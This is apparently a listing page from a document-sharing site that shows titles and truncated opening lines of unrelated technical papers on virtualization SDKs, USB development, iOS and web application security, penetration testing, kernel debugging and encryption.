Virtuozzo Virtualization SDK Programmer's Guide February 18, 2016 Copyright 1999-2016 Parallels IP Holdings GmbH and its affiliates. All rights reserved. Parallels IP Holdings GmbH Vordergasse 59 8200
More informationSecuring ios Applications. Dr. Bruce Sams, OPTIMAbit GmbH
Securing ios Applications Dr. Bruce Sams, OPTIMAbit GmbH About Me President of OPTIMAbit GmbH Responsible for > 200 Pentests per Year Ca 50 ios Pentests and code reviews in the last two years. Overview
More informationLearning USB by Doing. John.Hyde@intel.com
Learning USB by Doing. John.Hyde@intel.com The question that I am asked most often is how do I start a USB project? There are many alternate starting points for the design of a USB I/O device and this
More informationUsing the Tcl VFS for Encryption
Using the Tcl VFS for Encryption By Phil Brooks - Mentor Graphics Corporation & Arman Hunanyan - Mentor Graphics Corporation Presented at the 22 nd annual Tcl/Tk conference, Manassas Virginia, October
More informationCrystal Reports.Net 1.1 Patch
Crystal Reports.Net 1.1 Patch Hot Fix: crnet11win_en.zip Language: English Platform: Windows Last updated on: 4/4/2008 FTP Location: ftp://ftp1.businessobjects.com/outgoing/chf/crnet11win_en.zip WARNING:
More informationTivaWare USB Library USER S GUIDE SW-TM4C-USBL-UG-2.1.1.71. Copyright 2008-2015 Texas Instruments Incorporated
TivaWare USB Library USER S GUIDE SW-TM4C-USBL-UG-2.1.1.71 Copyright 2008-2015 Texas Instruments Incorporated Copyright Copyright 2008-2015 Texas Instruments Incorporated. All rights reserved. Tiva and
More informationSitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
More informationSystem Calls and Standard I/O
System Calls and Standard I/O Professor Jennifer Rexford http://www.cs.princeton.edu/~jrex 1 Goals of Today s Class System calls o How a user process contacts the Operating System o For advanced services
More informationPenetration Test Methodology on Information-Security Product Utilizing the Virtualization Technology
Penetration Test Methodology on Information-Security Product Utilizing the Virtualization Technology JungDae Kim (jdcom@ksel.co.kr) ByongKi Park (bgbak@ksel.co.kr) CONTENTS 1 Background Information 2 Vulnerability
More informationLinux Driver Devices. Why, When, Which, How?
Bertrand Mermet Sylvain Ract Linux Driver Devices. Why, When, Which, How? Since its creation in the early 1990 s Linux has been installed on millions of computers or embedded systems. These systems may
More informationVirtdbg. Using virtualization features for debugging the Windows 7 kernel. Damien Aumaitre. Recon 2011
Virtdbg Using virtualization features for debugging the Windows 7 kernel Damien Aumaitre Recon 2011 D. Aumaitre Virtdbg 2/42 Roadmap How it began Designing a kernel debugger Debugging Windows 7 x64 1 How
More informationSecureDoc Disk Encryption Cryptographic Engine
SecureDoc Disk Encryption Cryptographic Engine FIPS 140-2 Non-Proprietary Security Policy Abstract: This document specifies Security Policy enforced by SecureDoc Cryptographic Engine compliant with the
More informationUsing and Abusing Microsoft Fix It Patches Jon Erickson
Persist It Using and Abusing Microsoft Fix It Patches Jon Erickson About Me Jon Erickson (@2130706433) Engineer @isight Partners 2 isight Partners isight Partners Best commercial cyber threat intelligence
More information